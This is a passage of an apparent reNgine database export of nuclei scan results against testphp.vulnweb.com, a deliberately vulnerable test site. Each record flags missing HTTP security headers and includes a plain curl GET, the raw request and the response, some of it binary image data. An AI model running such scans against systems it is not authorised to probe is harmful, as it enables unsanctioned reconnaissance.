�(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 841, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:42:10.707Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 842, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:42:10.899Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 843, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:42:11.106Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 844, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:42:11.294Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 845, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:42:11.478Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 846, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:42:11.670Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 847, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:42:11.858Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 848, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:42:12.055Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 849, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:42:12.241Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error 